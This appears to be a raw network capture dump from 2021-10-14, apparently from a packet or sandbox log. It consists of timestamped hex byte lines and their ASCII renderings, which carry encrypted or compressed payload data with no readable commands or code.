                                                                        2021-10-14 08:47:23 UTC194INData Raw: fd 2d ea fb 95 0b dd cd 59 a8 3c c4 d5 08 91 f2 cf 87 b4 33 c3 79 73 53 e2 93 de 2d 4d 27 d6 50 a0 da 70 ff 23 3e 99 7f 04 aa 09 36 09 9d 2c 59 f0 3a 0f 42 1f 7a c7 03 00 85 34 fa 5b ce 3a 9e f3 50 46 3b 6f d5 6a eb 63 0a d1 13 5f 90 99 71 5c e3 b9 cc 58 80 4f 22 00 4d 99 18 b4 e4 f6 c3 be 50 59 b6 19 b2 ff ed 05 2f ea 86 c1 40 ba ca a7 4e 43 4e 15 e3 34 62 27 e5 25 98 c8 18 94 a1 78 82 a4 d8 7e d0 de 11 a0 ea ba e3 5f 36 b4 5e 45 d6 21 8d 46 37 2f bb 33 69 fa bc 9b 9c c9 94 d5 a2 92 16 05 d5 eb 03 fc 56 6b 42 2f 0c 4a fb bc d4 1b 42 79 f4 16 2c 9b c6 63 15 ec 18 1b cd a9 83 ce 87 46 a2 4a 06 11 cf 2e 2d f9 df 1a 09 b4 0a 48 4e d2 d3 2c 97 41 61 3b 39 a1 90 86 3c 09 ae 75 a6 6c 42 59 33 74 74 a4 2f 19 75 c4 e3 ce 48 3f 08 aa 7d 0a be 81 c6 06 39 2f 39 f1
                                                                        Data Ascii: -Y<3ysS-M'Pp#>6,Y:Bz4[:PF;ojc_q\XO"MPY/@NCN4b'%x~_6^E!F7/3iVkB/JBy,cFJ.-HN,Aa;9<ulBY3tt/uH?}9/9
                                                                        2021-10-14 08:47:23 UTC195INData Raw: f4 47 79 d0 1c 99 f8 88 6f d2 05 32 aa 99 bc bf 21 62 de aa d9 26 a2 8c cd 50 2e 70 1c ba 46 82 09 ec 21 62 0d 30 c0 5e 49 55 18 7d f9 d8 cd 45 a2 59 56 73 20 c9 c2 54 2d 4a ca 66 ab a3 cb 35 18 04 21 1e b3 69 81 c8 fa 1c 91 19 ca dc 05 53 08 53 a0 eb 3a b9 fe 5d 91 e8 e8 13 fc 74 ee 1b 84 b5 49 a5 a1 22 cd 0f 21 58 e8 b1 15 df b7 4d 3f 05 00 9b 6e 6a 12 e9 b4 01 c9 41 46 55 2d b3 dd d4 3e 32 cc ba 8b 7a f8 07 52 2c a4 fb 50 6f 9d d4 a7 fa 8c 86 4a fd 7c 93 ca 46 65 71 05 da 82 86 57 02 a9 f0 59 f2 50 8d e4 bb d2 b0 b3 bd 95 88 06 8f 0e 6c 4a 3f a7 bb f6 11 3f 5b ab d3 06 e1 a5 f7 1e ff f5 6b 56 50 56 6c e6 3c 0c fd 80 79 55 7a d7 2a 97 db 1e e1 4a 0e 48 b0 9e bb db 83 29 d1 33 92 fa 8c 47 da a1 38 f4 54 8d 78 36 7f ae 91 18 3a da 95 88 0f b1 6d e0 db a5
                                                                        Data Ascii: Gyo2!b&P.pF!b0^IU}EYVs T-Jf5!iSS:]tI"!XM?njAFU->2zR,PoJ|FeqWYPlJ??[kVPVl<yUz*JH)3G8Tx6:m
                                                                        2021-10-14 08:47:23 UTC196INData Raw: f1 e6 69 9a e8 b1 fc 1c 94 ac f6 ca 70 1a d1 95 57 72 32 74 46 79 58 74 ba 5c d0 69 17 39 b3 f4 28 ef 93 21 50 00 1c 6d 98 ed c8 20 83 13 f7 3e 67 78 cc 74 78 81 b8 e0 09 9c 5f 08 2c 28 d3 12 c2 03 3a 1f 39 8c df e2 61 12 b7 6a e9 3c 04 38 2a 59 22 d5 67 37 75 dc 86 e4 16 9c 5f 5b 0f 1d cc 56 89 1a 3e 14 68 90 86 df 2c 09 04 b5 3a 09 3e a2 c8 b4 e8 b4 3e e4 de 2f ff 95 84 2e cf b8 84 01 28 88 ec 7f 04 d7 fa 46 61 11 44 2e ce de 3f 3e a6 58 0c c2 a6 49 81 c5 87 a1 19 58 d2 c5 66 5e 03 c9 c9 52 b5 ba de 1d 3d 16 18 91 fa cc 09 bf 0a 88 31 d6 84 0e c7 27 ba 7d a9 9e ba 90 b5 4f dc 53 41 cf f8 6c 2e d7 7f ae 80 c5 25 d5 38 58 94 e4 b0 74 fe ae 1f 26 06 91 d5 5a c5 66 ea ea d6 60 8d c9 68 4d 5f a2 9f c5 59 78 d4 1b b2 59 f7 87 36 4b 08 23 a6 7e ab 51 1b bd e7
                                                                        Data Ascii: ipWr2tFyXt\i9(!Pm >gxtx_,(:9aj<8*Y"g7u_[V>h,:>>/.(FaD.?>XIXf^R=1'}OSAl.%8Xt&Zf`hM_YxY6K#~Q
                                                                        2021-10-14 08:47:23 UTC198INData Raw: ab 19 ca d9 10 11 7a 27 e0 af 8d 23 72 f4 9c 6e da 5e 8d c8 d5 f6 e7 e3 d9 a8 89 28 ac 15 3e 1b 3f a9 8d ba 61 19 51 99 c3 21 cd aa ee 62 a6 91 5a 39 46 70 6f e2 7f 5f 8e a1 75 5b 70 d3 2b 87 8f 28 a2 77 11 69 bb 98 c7 82 e7 04 9c 2a bc c5 8a 69 8c f1 0e 93 56 9c 53 3c 44 93 b4 4f 5e 83 d8 80 0e b0 5e c7 8c c2 21 4d 4d b0 f7 84 cd 85 30 ac e6 e6 d6 d6 c7 c0 5c 49 d3 2b 4c 51 94 85 32 f5 e0 8f c3 35 34 8d 23 1b 49 9b ca 98 bd 54 05 24 db dd 2f f0 20 c2 31 6a ee 86 0e 26 2f c3 4b 4d 98 40 43 84 81 d9 7d 42 b5 c0 25 05 fb 6f fc d0 3b c1 7c 59 60 2a 43 e1 9f f2 79 16 be 55 cd 3d a2 10 09 be 80 a2 ea 5e 5f c9 1e 17 53 15 f7 db 49 02 42 00 22 ac bd 14 ff c8 5e 9d 13 4b cf 95 44 07 fa 48 59 41 5f 04 10 7c 14 51 67 71 c6 47 9f cd aa 25 ea 98 31 d2 79 7d b6 03 8e
                                                                        Data Ascii: z'#rn^(>?aQ!bZ9Fpo_u[p+(wi*iVS<DO^^!MM0\I+LQ254#IT$/ 1j&/KM@C}B%o;|Y`*CyU=^_SIB"^KDHYA_|QgqG%1y}
                                                                        2021-10-14 08:47:23 UTC199INData Raw: 2c a7 e7 f5 8e 3a 21 c5 e0 09 62 3b aa c7 69 e1 a1 f9 78 5e 03 71 9b c9 98 03 bc 73 9e 03 d6 84 3c b3 3b b3 79 9f ea 96 8d 97 53 ea 5f 2d d9 d8 60 26 b6 4b 97 f4 e7 0f 81 05 70 f1 a1 af 11 cc a2 66 11 3b 91 ce 6d a6 6c d7 9e e0 41 fd cf 30 3e 5e 8e c0 e3 6e 16 c6 26 dc 4a fb fe 04 77 08 26 96 12 8a 5b 73 99 cc 08 aa e4 f9 f9 0d 23 07 85 41 0d b2 58 7b 0a 98 0d ac 8b a8 c7 db 57 a9 98 26 e7 36 ce e8 b2 1e dd 13 f1 a0 ae fe 91 e6 9e 1b be 1f 36 e6 b2 08 1e 67 47 2d 1f 4c af 94 f7 69 af 50 07 b2 14 80 6a 40 97 34 27 07 4b f6 1f ba 95 45 55 4e 71 fa 5f 7c da 11 af f0 94 64 b2 7a 53 82 8a 96 b3 3f 4f dc b0 fe 25 ab 92 c8 02 5a 50 3f bd 77 97 1a b8 21 62 34 05 f3 5a 64 76 7f 29 b8 a8 e3 4f a7 5d 26 5d 76 8f 90 5a 3b 48 cb 6d b4 f5 f9 76 39 02 31 09 dc 5e 87 dd
                                                                        Data Ascii: ,:!b;ix^qs<;yS_-`&Kpf;mlA0>^n&Jw&[s#AX{W&66gG-LiPj@4'KEUNq_|dzS?O%ZP?w!b4Zdv)O]&]vZ;Hmv91^
                                                                        2021-10-14 08:47:23 UTC200INData Raw: d5 50 7a e8 f2 08 07 40 cb 48 28 8d 71 45 be ae a9 6b 40 c1 f9 37 76 f9 5b 99 f3 23 c0 69 48 68 42 78 e5 89 f2 6a 26 a5 5e cf 3d b7 10 7d a7 a2 ac e3 73 5b c6 1e 72 1d 23 e5 f9 4c 3b 42 31 38 a3 be 18 91 e2 3f a1 2b 40 92 a3 59 05 f2 49 30 6e 5c 60 05 78 0e 73 6c 12 ea 51 93 c7 a8 4b cd 88 23 ca 5f 71 fb 2f 99 fb 7c cb 7d 3a be 2a 1d 48 84 d1 a2 c4 81 7c 50 6d 20 27 78 b0 81 c1 f7 10 25 5c df 75 d5 01 b8 13 6d 8a f5 5b 77 f7 99 d1 3c 09 22 09 e3 70 11 60 86 2e fd 8e 79 c5 c2 56 f6 d7 b1 36 b5 a3 44 cc 8f ee 82 41 46 d0 1a 0c a0 3f de 30 45 6f d7 d5 69 bf d3 c6 f0 24 fb ae c6 99 60 3c b8 9e 64 72 13 45 32 4e 7e 1d 8e 68 a4 4f 12 4b 98 c7 41 c6 a3 72 62 27 75 44 aa ed c3 1a ee 02 c3 4c 60 7e b8 65 44 ef bb b5 5d 96 59 7c 38 14 bd 12 97 44 1d 3d 6a bb fb 8b
                                                                        Data Ascii: Pz@H(qEk@7v[#iHhBxj&^=}s[r#L;B18?+@YI0n\`xslQK#_q/|}:*H|Pm 'x%\um[w<"p`.yV6DAF?0Eoi$`<drE2N~hOKArb'uDL`~eD]Y|8D=j
                                                                        2021-10-14 08:47:23 UTC201INData Raw: 19 35 6b 61 3b 18 4c a3 8e fa 7a a8 53 07 a8 05 8a 06 03 85 21 27 2d 7c fd 7e 99 89 50 6a 54 7e 9b 69 78 b5 3c 80 91 a3 6c b2 71 5f ef a9 b4 d1 12 47 bf 8c d0 4a 81 97 c1 04 7d 4d 22 b6 54 9b 69 ba 44 5e 1f 33 e2 7e 64 47 59 3e ae b9 e1 21 93 5d 52 48 76 88 b2 50 26 4b c1 50 b3 e2 9c 54 38 6d 06 09 ba 76 8f da eb 61 b2 02 c1 8e 5a 53 1a 45 b1 c6 4c e5 9a 40 92 da f8 34 d0 7b f7 28 f5 c7 64 ba 80 04 f0 0f 60 0f 89 8e 70 f9 b6 70 03 14 42 dc 0b 4d 09 f3 ae 07 9f 12 2b 1e 05 af e6 da 20 3e fa 9e 98 76 eb 0a 60 4b 85 e6 6c 57 a4 da bb fa 93 ff 4d aa 08 95 fd 25 04 57 0b e2 cb 8f 46 40 c2 a0 6a e5 50 84 ad b7 cb 86 e4 d0 c1 83 22 e1 1d 3f 0a 60 a3 8b a6 7c 6d 4d af c3 0c e1 bf e6 42 c9 a3 5e 4c 69 6b 45 f7 79 73 89 b7 71 34 79 fb 30 bc ac 41 8d 7b 32 78 ad 9e
                                                                        Data Ascii: 5ka;LzS!'-|~PjT~ix<lq_GJ}M"TiD^3~dGY>!]RHvP&KPT8mvaZSEL@4{(d`ppBM+ >v`KlWM%WF@jP"?`|mMB^LikEysq4y0A{2x
                                                                        2021-10-14 08:47:23 UTC203INData Raw: 30 62 89 39 fd 8f 60 d2 c6 75 f6 cc b7 36 d2 e2 63 c5 9f f0 84 4e 42 fb 2b 01 b8 1b f5 27 52 76 cd db 06 95 bc f8 f0 3e f5 a3 cb ae 5b 3e b4 82 62 06 3d 4f 28 5b 74 17 9d 79 a4 43 2d 57 f7 f2 47 c9 ad 44 62 10 64 49 a8 9d f4 1c ec 1c a2 7f 77 4a b9 7a 48 ef a8 f0 71 9a 6f 78 3e 14 bc 1b 97 64 1d 3d 66 8b ec 91 46 36 de 5f cb 55 2d 00 2a 6d 11 a1 70 25 10 c8 80 e2 20 a5 7d 32 13 16 b8 6e a5 38 61 26 4a f1 90 fc 5f 2e 37 c6 3d 2d 57 b7 ea dd e1 8c 3e d0 f1 5c e3 b1 b0 4c c5 bf a9 25 37 94 eb 03 3f fd da 41 63 05 4a 11 a0 f9 0c 7b 9d 6a 6f f3 85 20 ab fc 87 a2 20 2e fc e0 09 78 54 9a dc 77 dc b6 ee 5e 31 2c 68 94 df a5 1f 87 64 ee 34 a3 8d 59 a0 01 a6 50 bd ea 85 93 88 4f e3 7e 42 dd d3 14 1e b2 49 a9 d3 ee 14 b3 08 4b f1 d8 ac 1b cf 98 1f 06 3b e5 c2 43 a9
                                                                        Data Ascii: 0b9`u6cNB+'Rv>[>b=O([tyC-WGDbdIwJzHqox>d=fF6_U-*mp% }2n8a&J_.7=-W>\L%7?AcJ{jo .xTw^1,hd4YPO~BIK;C
                                                                        2021-10-14 08:47:23 UTC204INData Raw: c5 a8 75 ae 1c 01 7b 26 af f9 dc 31 17 c8 98 8b 7e ef 13 05 5e e0 d7 5d 78 9b df ac e9 ae 9e 58 ae 11 af de 10 17 25 2f e1 bf 8d 51 34 df 99 7f d4 5e 87 db b0 d4 f2 e2 cf c1 a5 26 8f 1b 28 07 79 85 8d ae 70 19 4a af c5 53 cf ae f7 70 8a 9a 52 49 70 6b 67 e0 0d 69 98 a0 6a 51 6c dd 2b 8e 9a 5d 95 7b 13 01 b9 8f fe b2 c7 0f ef 20 b4 da ab 6a 9e f1 7c f4 40 8d 78 36 6e 94 a4 72 5f 95 b7 8b 1d a1 73 85 b6 c0 10 60 45 b0 e6 88 f7 8a 2b ab df eb d6 a1 eb c1 08 78 c4 13 76 48 98 94 5d f7 f7 8f f2 26 41 a2 3f 2f 3b ba c6 ea da 77 1d 14 c1 dc 4a e0 37 d7 31 6c ea a2 19 0f 2a ca 4c 5c af 66 43 8e 96 d9 4d 4b a4 fe 22 26 ec 53 f3 c5 39 c7 58 5f 77 03 5e 8d a8 f2 7f 12 be 5f c2 58 a7 01 4c 8a 80 a2 f5 17 61 c7 1a 19 36 32 d7 c7 5f 20 55 73 36 a8 ae 2e b1 f0 52 96 1a
                                                                        Data Ascii: u{&1~^]xX%/Q4^&(ypJSpRIpkgijQl+]{ j|@x6nr_s`E+xvH]&A?/;wJ71l*L\fCMK"&S9X_w^_XLa62_ Us6.R
                                                                        2021-10-14 08:47:23 UTC205INData Raw: f7 e9 46 f9 a7 dd 21 f8 a4 b1 34 2c 8a e7 42 12 e1 b4 61 6e 04 5f 1d a3 b2 3c 5b 9d 7b 22 d4 94 2e b1 fe e6 95 0b 20 e5 e0 03 65 27 a0 c7 6b c6 d8 ee 78 2a 1e 51 9b ce a0 19 8c 6f a7 08 91 8f 36 a5 05 be 40 8e fb 85 9e b7 43 f5 54 5e aa ce 71 0d 88 74 98 e3 ea 08 b1 19 49 fa e6 84 1b da 97 73 2e 2e f4 ef 63 b1 6e dd 84 c7 38 de d3 43 39 5e 97 b1 e3 6e 14 de 26 d1 4a c6 e8 1a 61 08 13 9a 0a b0 45 7a 80 d7 00 df ca d7 e1 09 2d 18 81 35 34 a5 78 4a 01 a2 0b bb 9d bf da c1 4b bf 98 12 f6 30 f8 cf bb 3b cc 0d f1 b5 8f fa a6 fa 9d 01 b8 6d 01 83 b2 08 12 77 74 2c 04 51 a4 89 83 4d bf 48 2c 80 14 8a 1f 73 85 44 34 17 4d cc 5c 93 84 47 4a 27 55 fe 5f 56 dd 1e 9f e2 e7 46 d7 40 7b 82 8e be b4 10 44 dc ab d9 2f b5 8d ad 32 57 4a 24 b6 58 d8 3d b4 4c 4f 32 02 83 5f
                                                                        Data Ascii: F!4,Ban_<[{". e'kx*Qo6@CT^qtIs..cn8C9^n&JaEz-54xJK0;mwt,QMH,sD4M\GJ'U_VF@{D/2WJ$X=LO2_
                                                                        2021-10-14 08:47:23 UTC207INData Raw: f7 6d 4a ca 2a 75 4b fd af 1c e2 fc e1 f6 06 24 92 22 31 4f fe e2 eb bd 73 1e 03 fc cb 39 d6 29 c6 50 6b ea 86 34 35 33 ca 5d 69 8d 71 5f 95 e4 8e 6b 45 82 f3 39 13 f0 48 99 f3 37 c7 6d 6e 69 05 49 e3 8f 97 58 3b bf 44 cd 50 ea 38 68 96 93 aa e2 7a 57 c6 0d 72 0b 2b fe f0 41 2a 4a 16 3f b9 da 30 8b f1 5e 97 17 6b cf 88 43 66 d8 43 2f 69 49 0f 2c 70 1f 58 76 71 dd 58 96 ed a0 28 eb 9c 35 d0 4e 1c b2 0e 9f c5 5b c3 61 38 fe 17 70 6e 86 cc 9c c2 f3 5f 4c 76 4d 02 7c b7 bb b4 b6 31 23 4b d8 6f b2 48 bc 39 41 8f d6 51 28 ad be a5 29 05 38 31 af 5a 01 62 8b 1b f6 ae 48 de ca 6b f6 a5 bf 3d a6 fc 52 cd 9f f3 95 20 51 d0 2a 32 80 37 ee 2f 74 69 cc dc 1d fb fb d4 ea 0b fc ae d0 89 7b 3b bf 84 03 37 3a 44 07 7d 6f 11 88 7d d0 68 27 5e 9e cf 69 c9 a5 44 66 21 1c 68
                                                                        Data Ascii: mJ*uK$"1Os9)Pk453]iq_kE9H7mniIX;DP8hzWr+A*J?0^kCfC/iI,pXvqX(5N[a8pn_LvM|1#KoH9AQ()81ZbHk=R Q*27/ti{;7:D}o}h'^iDf!h
                                                                        2021-10-14 08:47:23 UTC208INData Raw: b8 0d ac 87 80 d6 d7 25 aa e1 41 e5 3b 91 f2 a5 1b c8 04 f5 ef 93 ef b1 e6 80 06 bf 14 7d a5 a7 14 1a 4c 6b 3f 1f 5f ba 92 fa 2a bd 59 07 98 27 96 19 66 9b 26 3f 0b 39 d4 7a 8f a0 4d 5c 44 67 ef 42 7b d2 3e 9e e2 82 6c d0 58 4b ef 88 bc a5 0a 6b db a0 cf 2f b4 8d eb 00 43 50 3c aa 35 bb 1c b1 55 43 30 1d fa 0d 40 7a 54 4c 89 b4 e3 42 bf 7b 49 6a 6a fb 91 46 3b 4c c1 6e e9 c2 8c 5b 21 04 2f 09 f2 49 8b dc e7 53 aa 19 de 8e 43 3a 12 4e eb df 66 f9 93 6e 80 fd e9 34 c6 34 d8 41 d8 d4 6f b3 f4 0c c6 0f 4d 3e 87 97 11 d2 83 6c 28 02 5a ca 0f 52 30 c5 b7 1a 88 0a 46 5d 3a af ea c1 37 03 c0 98 8f 70 fe 08 12 55 e0 f5 56 6f ab e9 ac fc 97 8c 5e bd 05 ca cd 10 11 7a 29 ee bb 89 40 5d e9 89 0b c6 44 88 c1 bc d2 ff 87 d2 b1 b8 0a 90 0f 3b 12 56 9e 86 c3 7e 1d 61 83
                                                                        Data Ascii: %A;}Lk?_*Y'f&?9zM\DgB{>lXKk/CP<5UC0@zTLB{IjjF;Ln[!/ISC:Nfn44AoM>l(ZR0F]:7pUVo^z)@]D;V~a
                                                                        2021-10-14 08:47:23 UTC209INData Raw: 24 02 4e 6b 17 cd ea f2 e3 41 50 32 ae 1d 92 00 ed 6e af 6e 82 1e 40 c2 c7 a3 4e 63 44 60 ed 37 66 03 e6 5c 96 cc 18 b0 b1 85 13 ab dd 58 d2 be 03 c7 ef bd e1 32 b6 28 5b 6d d5 5f 9f 2d 33 06 b8 b3 67 fd bc b2 9f 46 9a cd a5 ca 16 4f df e1 83 d7 57 26 54 73 0a 54 fa 1b bd 24 40 3c d7 a3 29 a4 da 25 16 54 14 24 cb ea 83 69 8e 63 86 3a 05 2c c2 1e 28 81 dc a7 89 38 0f 28 4a 6f 53 b0 93 03 79 44 37 cc 89 e2 39 54 b0 29 b1 2e c2 a3 38 9e a5 c7 af b4 67 3b 3a 9e 4f d5 08 49 fc a5 b6 0c c0 4c 2c f5 db 96 c4 88 2d 78 d2 50 5a 7f 3f c6 96 b1 ae e2 2c 03 59 2a b7 d4 cf e2 42 cc e7 50 5f eb 0e f8 6f 95 bc 20 97 ba 39 f8 1f 8e e8 eb f8 0a 1e 06 00 41 d8 9a 84 c7 4e 52 9f b2 65 17 5a d8 28 f0 a4 58 70 19 5e 40 10 e9 aa ec 6f e0 17 eb 6e de e4 79 c4 65 cf 0a f6 96 f2
                                                                        Data Ascii: $NkAP2nn@NcD`7f\X2([m_-3gFOW&TsT$@<)%T$ic:,(8(JoSyD79T).8g;:OIL,-xPZ?,Y*BP_o 9ANReZ(Xp^@onye
                                                                        2021-10-14 08:47:23 UTC210INData Raw: 8b 0f 42 cd 3e b4 39 c3 74 1b 91 f1 ca 86 19 36 88 78 70 5d 54 95 bc 31 5d a6 f2 4d df b3 6d e2 99 22 e8 62 04 b7 fa 27 66 9a 31 45 12 0e 6e 5f 01 67 38 1f 63 b0 28 f8 ad cf 4a 94 ed 41 be 32 00 c9 79 de 94 16 be 0e 53 8d 71 45 34 e1 ba dc a3 89 3b 3e 10 78 6b 04 df f9 f9 de 51 64 2c b4 11 b5 02 fe fd ae f9 06 eb 53 aa cc a5 4c 61 51 6b ed 2c 65 0f fb 42 8d d8 99 3c a2 1b 82 b9 c4 44 cf bf 0c be f7 81 fc 22 28 b5 56 65 d4 5d 91 58 2a 1a a4 bc 6f fb bf ad 82 54 96 cb a2 cb 16 52 d7 e0 02 73 4a 20 5a 19 19 66 79 84 d1 34 42 3f d7 a3 29 a2 d5 21 10 55 1f 28 d1 f1 82 72 96 60 23 af 04 33 cc 12 0d 80 cf b5 01 e8 1a 09 4b 68 c1 f4 1a 02 66 49 2c dd 08 6f 24 5a b7 af 1f 3b 01 60 3f 0c f5 4c 2e 74 67 3a a7 93 47 db 0b 55 72 64 ad 1b 41 d5 3f 7b 30 82 65 14 39 78
                                                                        Data Ascii: B>9t6xp]T1]Mm"b'f1En_g8c(JA2ySqE4;>xkQd,SLaQk,eB<D"(Ve]X*oTRsJ Zfy4B?)!U(r`#3KhfI,o$Z;`?L.tg:GUrdA?{0e9x
                                                                        2021-10-14 08:47:23 UTC211INData Raw: 7c f0 94 fa 04 ba 3c 3e ef eb c4 d4 48 2f a2 c1 b5 5b 45 cf a9 62 48 39 50 d7 36 f6 69 dd 28 2d 45 6c 86 10 04 1c 25 44 ce d8 8e 24 da 30 23 1a 12 e6 c7 31 4f 3f a7 12 47 0c fb 3d 48 6a 4c 71 d9 07 eb b3 8b 2f c3 7e b8 f3 2a 56 6f a2 d0 8b 8b 9a e3 0c e9 95 91 5a a8 18 98 2e b5 b0 3d cb fa 76 a0 79 0f 6f ee e3 72 a2 cf 16 64 77 33 ab 73 3b 73 ae dd 72 f9 6e 43 03 4d c2 83 b5 50 5a ac f7 ef 0e 8f 3f 67 06 f5 80 b1 12 f6 b5 c7 8e ec 7d 23 cd 72 c4 a2 7d 78 20 77 8a c5 f5 26 3c 95 ed 0e 8b 2d fb 2f f4 ae 9b 82 a0 c4 fa 4a e9 72 47 7b 2d 68 ea de 14 63 23 cf a5 d1 a5 d9 01 22 d4 f0 22 3c 18 1a 1f 97 03 34 e0 d7 0e b6 03 83 41 fe ef 35 e4 0c e3 14 c3 ef 84 ff ea 66 bc 70 d0 ba c4 15 e9 99 0e f6 26 fa 8e 60 28 f4 d9 3d 3f fb dd ee 6c c1 1c 80 ef b8 61 2b 21 df
                                                                        Data Ascii: |<>H/[EbH9P6i(-El%D$0#1O?G=HjLq/~*VoZ.=vyordw3s;srnCMPZ?g}#r}x w&<-/JrG{-hc#""<4A5fp&`(=?la+!
                                                                        2021-10-14 08:47:23 UTC212INData Raw: b2 bf 90 5d 85 4d 13 c8 1a 40 d9 ed 0d 79 74 20 53 0c 8e d9 fa 1a d0 39 43 3e e2 b3 aa 07 c4 2f 18 5e 3c 2a d8 fc 02 c4 81 61 a2 2d 04 2a d9 06 af 30 de bb 07 f1 0d 0a 58 fc e6 67 17 e7 62 4e 33 c1 9c f0 a7 4d b5 21 b1 32 4c 73 24 10 7a c0 3e e3 c4 b9 ed 9e 41 c8 07 52 7b 7d b6 07 ce 5e 57 68 30 96 e4 8a 2d 64 5c bb 4c 58 3b d2 8c 35 17 e3 30 9e 86 3d 15 61 cf 0b 85 4b 66 57 7e f8 9c af c5 9c b1 12 17 65 a9 c5 c8 bc 69 2c 67 ce 04 83 f1 48 d9 9c 89 e8 49 5e 80 80 e7 8f 55 c7 b5 0b bb d0 94 13 56 6c 1f e5 b8 de ed 71 0b fc e7 96 f6 4b 46 fd d3 01 eb 8c 76 66 c2 38 1b 7a 23 a4 b3 06 f9 77 33 e4 e9 8e 60 d0 6e 81 d4 b3 81 7c a5 f8 17 6b 5e 92 8c 80 0c 1b a3 68 79 24 88 8a 30 5f bb 6b 92 a0 02 6d a0 c2 2b 3f bd 06 34 1c 06 6e f3 12 ef 67 1b 9f be 04 aa c9 96
                                                                        Data Ascii: ]M@yt S9C>/^<*a-*0XgbN3M!2Ls$z>AR{}^Wh0-d\LX;50=aKfW~ei,gHI^UVlqKFvf8z#w3`n|k^hy$0_km+?4ng
                                                                        2021-10-14 08:47:23 UTC214INData Raw: 71 45 25 79 8e df ef 29 3a 80 f5 17 85 b3 c8 b1 c7 cf 9b 82 a0 dd fa 53 fc 78 53 5e 3d f8 7d f6 0c 68 23 cf bb 54 ae d6 86 33 d4 e9 22 25 18 1d 0a 94 2d 38 fc dc 01 31 10 9e 42 e2 f6 3a d4 10 7c 1d c3 e4 97 ff b6 68 9c 76 cc ac ca 1b ed 9c 06 c0 34 f0 19 7b ab 63 d6 32 bb a6 cd f5 ea 5d 00 97 64 e5 6a 3f 27 d7 9e f7 9d e5 4b 4e 89 9e bb cb 80 af 14 30 b9 de 59 2d 94 ee 40 92 98 93 88 48 5c fd 4a 5f 3c fe ad 8a 58 88 7f 75 86 a9 5b b6 57 33 c9 19 9d 73 2b 75 52 2e b6 29 f8 95 71 e9 f8 d7 12 29 cf 8d d2 73 90 2e 18 e0 52 bb 0f 44 17 ed 8d 85 f3 9c 0b 44 c2 3e a6 33 cc 7d 18 7a bf c5 87 14 3a a6 77 63 d1 0b 94 b5 2e 41 29 7b 59 c9 da 70 fc 8d 3b f4 7e 08 a9 ee 37 62 9c 3d 57 08 33 6e 4a 1a 7c 3e 0c 7f 8d 3d f2 be c8 40 8b e3 d1 27 3b 12 c8 65 f6 94 05 ac 0e
                                                                        Data Ascii: qE%y):SxS^=}h#T3"%-81B:|hv4{c2]dj?'KN0Y-@H\J_<Xu[W3s+uR.)q)s.RDD>3}z:wc.A){Yp;~7b=W3nJ|>=@';e
                                                                        2021-10-14 08:47:23 UTC215INData Raw: ef 53 50 88 9a 6e 1e 5c d4 a0 0d a8 d0 81 15 4c 28 10 fd a5 d1 64 ed 0a ec 64 d8 ed 70 c0 76 c7 1d 7f 07 f6 ed 42 6a 94 34 38 b8 3c 8d 78 c5 bc b6 8e 88 73 c8 72 08 89 a4 e0 69 bd eb 1a 69 4c 10 dd 10 ac 0f ba e0 b3 30 83 a4 3e 43 33 f4 97 a8 1a 7f be 5f a0 bc 9a 89 69 17 15 65 e2 7b fd 8a 9e e5 bb 70 af b5 14 89 60 47 67 89 46 5d c4 36 32 60 d6 7c cf f9 c3 bd a6 38 cf 8a c3 03 4c 8c a4 ce eb 85 73 f1 c4 e0 8a c0 10 cb 65 eb 68 5b fb d0 65 62 25 07 50 68 1e cb fb 9e 29 de 3b 71 db 6e e1 6a 02 ea 4a 7c 75 33 86 0d 7a 7c 34 2b a6 52 89 4f 1b a0 6d 6c 08 e6 13 33 74 3c e1 fd 58 91 5b 3f ae 46 0c 48 c9 eb bf e3 27 3b 5e dd 20 e7 eb 6c 23 24 4e 78 84 08 0f 06 ac d1 c3 d0 84 27 f4 39 34 9b 8e f8 c8 38 4e 30 b9 06 da 95 f7 3d 5d 6b 42 6e da 07 eb a6 c7 35 d1 65
                                                                        Data Ascii: SPn\L(ddpvBj48<xsriiL0>C3_ie{p`GgF]62`|8Lseh[eb%Ph);qnjJ|u3z|4+ROml3t<X[?FH';^ l#$Nx'948N0=]kBn5e
                                                                        2021-10-14 08:47:23 UTC216INData Raw: f2 6b 64 47 af 2f 28 ee fb 32 e1 e4 dd 08 36 41 03 54 36 9e 3c 99 a4 5a b1 1d 2d 01 6c 28 8d fb 93 0b 52 cc 30 ac 32 c4 75 09 fc 02 cd 87 17 36 a8 76 72 53 42 92 45 2d 4f 25 75 56 cf dc 7a fa 83 22 e5 ff aa af e0 2a 77 1d 85 5f 07 3f 68 4a 15 72 32 22 70 8d 3d f7 ae c5 49 94 f9 58 a2 27 19 dd 63 e3 92 0e 82 11 57 98 6b 74 09 e2 ba c6 a4 86 3f 29 09 45 6d 11 c6 c4 f5 c8 4b 59 3b b1 0b b9 06 e4 61 25 e3 8c 22 4b df c2 a2 5f e3 cd 66 eb 3d 6a 07 c7 5f 99 c1 1c b7 b2 86 03 ae d8 5a c3 20 90 b3 69 1c f0 a3 b7 b3 5e 6c df 4f 0e c5 31 06 b8 ba 78 78 3d b8 9e 4a 9c de 21 4b 05 cd 50 f6 03 73 53 31 c5 9f 07 74 fa 1b 52 2f 50 bb f2 b3 aa af c2 3c 07 d5 b0 2e cd ec 8b 69 9a 75 b6 3c 0e 31 c4 1f 30 90 5c 11 01 e5 00 14 40 77 cf 7d 90 04 70 41 31 c7 8d ff 34 c4 1f 2b
                                                                        Data Ascii: kdG/(26AT6<Z-l(R02u6vrSBE-O%uVz"*w_?hJr2"p=IX'cWkt?)EmKY;a%"K_f=j_Z i^lO1xx=J!KPsS1tR/P<.iu<10\@w}pA14+
                                                                        2021-10-14 08:47:23 UTC217INData Raw: 4a ed da c2 f3 83 28 c8 bc 97 c9 77 65 93 0b f1 46 41 f2 dd 81 9f 1f e9 35 3a 35 92 7f 39 95 60 6e 6d 68 e5 09 b5 36 20 6f 03 cb 51 a4 21 9f c0 af ca 2b ef 2d 89 20 37 5e d5 32 f4 7b 5d cd 22 50 51 86 1f 81 f8 3c cc 23 d6 9e a1 01 29 a7 23 1d f3 c5 3d 5a b8 48 11 47 7c eb 32 59 70 4c 62 d4 14 f3 a0 80 3c c5 78 b9 e1 3f 4e 73 29 e5 9d 08 9a 7e e7 fa 87 82 4e b2 1c 93 21 be bf 15 c2 dc 6c b1 73 07 78 69 7a 71 ac 53 e8 44 63 b2 30 6f 2c fd 4c dd 7f f3 61 c7 6b 4a cd 8c bf 5b 4e ae e3 fb 92 b3 6e 72 ac 0c 94 33 19 f3 a6 cc 93 f4 df 2a da 6e 4b 33 74 77 a5 86 83 cc ef 21 3a 9f ec 16 8b 2c f5 b0 d7 a1 86 85 bc cf f6 ce d8 7d 7a 7c 3d f8 7f 2f 1f 